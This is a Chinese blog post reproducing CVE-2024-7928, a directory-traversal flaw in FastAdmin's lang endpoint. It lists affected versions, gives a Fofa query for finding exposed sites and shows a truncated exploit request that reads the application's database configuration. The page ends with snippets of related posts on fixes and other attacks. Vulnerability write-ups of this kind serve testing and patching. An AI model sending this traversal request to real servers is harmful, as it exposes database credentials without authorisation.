FastAdmin目录穿越 CVE-2024-7928

已于 2024-08-27 17:18:24 修改
阅读量1.1k 收藏 1
点赞数 22
分类专栏: 漏洞复现 文章标签: 安全
于 2024-08-24 22:42:05 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xc_214/article/details/141506312
版权

0x01 漏洞描述:

FastAdmin是一款基于ThinkPHP+Bootstrap开发的快速后台开发框架。FastAdmin基于Apache2.0开源协议发布,免费且不限制商业使用,目前被广泛应用于各大行业应用后台管理。其接口lang存在目录穿越漏洞,攻击者可通过该漏洞获取系统库敏感信息。

0x02 影响版本:

FastAdmin < 1.3.3.20220121

0x03 搜索语句:

Fofa:icon_hash="-1036943727"

0x04 漏洞复现:

GET /index/ajax/lang?lang=../../application/database HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (X11; Linux x86_64) Ap
了解本专栏 订阅专栏 解锁全文 超级会员免费看
Web中间件常见安全漏洞总结
qq_40907977的博客
08-14 6903
IIS IIS是Internet Information Services的缩写,意为互联网信息服务,是由微软公司提供的基于运行Microsoft Windows的互联网基本服务。IIS目前只适用于Windows系统,不适用于其他操作系统。 解析漏洞 IIS 6.X 基于文件名 该版本 默认会将 *.asp;.jpg 此种格式的文件名,当成Asp解析,原理是 服务器默认不解析; 号及其后面的内容,相当于截断。 基于文件夹名 该版本 默认会将 *.asp/目录下的所有文件当成Asp解析。 另外,IIS6.
红队攻防文库
正是修行时
08-23 609
各家兴便是天下大同
fastAdmin lang接口任意文件读取漏洞(内含XrayPoC)
WuYSec的博客
06-18 1690
fastAdmin是一款基于ThinkPHP和Bootstrap开发的开源后台管理框架,旨在帮助开发者快速构建高效、灵活的后台管理系统。fastAdmin存在任意文件读取漏洞,可直接读取数据库配置文件。
fastadmin框架低版本漏洞,任意文件读取漏洞(CVE-2024-7928),/index/ajax/lang?lang 修复办法
loricy7的专栏
11-20 1458
通过/index/ajax/lang?lang=en,可以获取到一些敏感文件的信息。关于这个漏洞,是由于旧版本对获取语言标识。官方已于2022年05月30日发布。所以fastadmin框架版本低于。的过滤不严可能导致安全问题。版本,并修复了这个漏洞。对应的数组中添加以下代码。版本,就需要进行修复。方法三:更新框架版本,
FastAdmin任意文件读取漏洞,
Python_0011的博客
03-07 1198
一、漏洞描述FastAdmin是一款基于ThinkPHP+Bootstrap开发的快速后台开发框架,FastAdmin基于Apache2.0开源协议发布,免费且不限制商业使用,目前被广泛应用于各大行业应用后台管理。astAdmin框架存在任意文件读取漏洞,攻击者利用此漏洞可以获取系统敏感信息。二、影响版本FastAdmin版本 < 1.3.4三、资产测绘app=“FASTADMIN-框架”四、漏洞复现。
任意文件读取漏洞(CVE-2024-7928)修复
bigwood99的博客
11-26 1595
验证CVE-2024-7928问题是否存在可以使用如下方法:
【漏洞预警】FastAdmin框架任意文件读取漏洞
晚风不及你
06-11 3488
FastAdmin是一个基于ThinkPHP和Bootstrap的快速开发的后台管理系统框架。FastAdmin框架存在文件读取漏洞漏洞,攻击者利用此漏洞可以获取系统敏感信息。
【漏洞复现】FastAdmin——lang——任意文件读取漏洞
LongL_GuYu的博客
06-27 5491
FastAdmin是一个免费开源的后台管理框架,其lang存在任意文件读取漏洞,未授权攻击者可以利用其读取网站配置文件等敏感信息。
fastadmin前台分片漏洞
Fiverya的博客
12-05 3643
参考链接:fastadmin安装fastadmin安装前台分片漏洞复现:https://blog.csdn.net/weixin_43288600/article/details/121192252https://blog.csdn.net/u013921288/article/details/117670844https://xz.aliyun.com/t/9395FastAdmin最新RCE漏洞复现https://www.secpulse.com/archives/157307.html搭建好环境后,查
Web中间件常见安全漏洞
KHOST的博客
03-19 9577
第一章:IIS IIS 6 解析漏洞 IIS 7 解析漏洞 PUT任意文件写入 IIS短文件漏洞 HTTP.SYS远程代码执行 (MS15-034) RCE-CVE-2017-7269 第二章:Apache 未知扩展名解析漏洞 AddHandler导致的解析漏洞 ...
2024版最新148款CTF工具整理大全(附下载安装包)含基础环境、Web 安全、加密解密、密码爆破、文件、隐写、逆向、PWN等全套工具
Libra1313的博客
10-23 9838
经常会有大学生粉丝朋友私信大白,想通过打CTF比赛镀金,作为进入一线互联网大厂的门票。但是在CTF做题很多的时候都会用到工具,所以在全网苦寻CTF比赛工具安装包!
fastadmin(V1.0.0.20200506_beta) 前台 getshell(文件上传解析) 漏洞分析1
08-03
2、在 linux 下, is_file() 函数判可用于判断符号链接 3、在 linux 下, is_file 函数会受到权限的影响,当前用户权限不足或父目录
FastAdmin最新XSS漏洞(CNVD-2025-03743)
最新发布
护卫神的博客
03-19 553
FastAdmin是一款基于ThinkPHP的开源后台管理框架,专为快速开发设计。国家信息安全漏洞共享平台于2025-02-14公布该程序存在代码注入漏洞。
抓 Windows 密码,这 7 种技术够不够用!
bigbangbangbang1的博客
12-09 973
内网渗透中,获取到 Windows 系统权限之后,抓取本地哈希是必不可少的操作,今天分享一款工具,集成了 7 种转储 LSASS 内存的方法,工具地址:运行如图:未提供任何参数运行程序,会要求你输入所要指定的方法,参数为 1-7,功能分别对应:使用解除挂钩技术转储 lsass 内存以注入修改后的 mimikatz 二进制文件。使用解除挂钩技术转储 lsass 内存以使用 MDWD 的直接系统调用注入二进制文件。使用简单的 MiniDumpWriteDump API 转储 lsass 内存。
通达OA低版本文件上传+apache解析漏洞getshell
谢公子的博客
05-12 2040
目录 漏洞文件 漏洞利用条件 漏洞复现 漏洞文件 /general/vmeet/privateUpload.php 漏洞利用条件 通达OA低版本 apache存在解析漏洞 漏洞复现 测试环境:通达OA 2008,apache存在解析漏洞 首先访问是否存在该文件 存在的话,将下面代码保存后缀为1.html文件,然后将木马命名为 aaa.php.1,与1.html在同一个目录下 <form id="frmUpload" enctype="multipart/for..
FastAdmin后台开发框架 lang 任意文件读取漏洞复现
0xSec
06-17 3934
FastAdmin后台开发框架 /index/ajax/lang 接口存在任意文件读取漏洞,未经身份验证攻击者可通过该漏洞读取系统重要文件(如数据库配置文件、系统配置文件)、数据库配置文件等等,导致网站处于极度不安全状态。
FastAdmin 任意文件读取漏洞复现
网安小白
09-04 1767
FastAdmin 后台框架开源且可以免费商用,一键生成 CRUD, FastAdmin 是一款基于 ThinkPHP 和 Bootstrap 的极速后台开发框架,基于Auth验证的权限管理系统,一键生成 CRUD,自动生成控制器、模型、视图、JS、语言包、菜单、回收站等。(Fast Admin 极速 后台 框架)Fastadmin框架 lang接口处存在任意文件读取漏洞,恶意攻击者可能利用该漏洞读取服务器上的敏感文件,例如客户记录、财务数据或源代码,导致数据泄露。
tp5 webshell漏洞,文件被篡改,fastadmin老版本的存在此问题,解决方法
qq_41409720的博客
08-30 3263
1.首先是把攻击文件清理。 找攻击文件的方式有在静态文件目录查找后缀为 “.php”的文件就好了 2.修改tp5底层的一个漏洞: 修改第一个文件 yourpath\thinkphp\library\think\App.php 搜索 public static function module( 找到 ==》 // 获取控制器名 $controller = stri...
fastadmin 后台访问域名报你所浏览的页面暂时无法访问 解决
热门推荐
宋拾壹的博客
04-25 1万+
找到application/extra/site.php 中最后加一行代码 'version'=>'1.1.1' 版本号的原因。
深信服CVE-2024-38077漏洞扫描工具及修复方案
资源摘要信息:"深信服CVE-2024-38077漏洞扫描工具" 一、漏洞概述 CVE-2024-38077指的是深信服公司产品中存在的一类安全漏洞,通常这类漏洞会在特定的软件版本中出现,可能会被攻击者利用来执行远程代码执行、获取...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

iSee857

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值